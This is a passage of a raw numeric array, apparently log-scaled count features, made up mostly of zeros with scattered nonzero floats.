0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 3.4965075614664802, 5.723585101952381, 0, 0, \n 3.800574088041945, 0.0, 4.518263445217986, 0.0, 0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 3.295836866004329, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 4.969813299576001, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.3862943611198906, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.295836866004329,\n 0.0, 5.545177444479562, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, \n 4.7535901911063645, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.6635616461296467, 0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 2.0794415416798357, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.174387269895637,\n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6375861597263857,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.430816798843313, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 4.532599493153256, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.3978952727983707, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 7.193685818395112, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 2.3978952727983707, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, \n 2.550898738446989, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 3.5263605246161616, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, \n 2.833213344056216, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.292158018817389, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.030437921392435, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 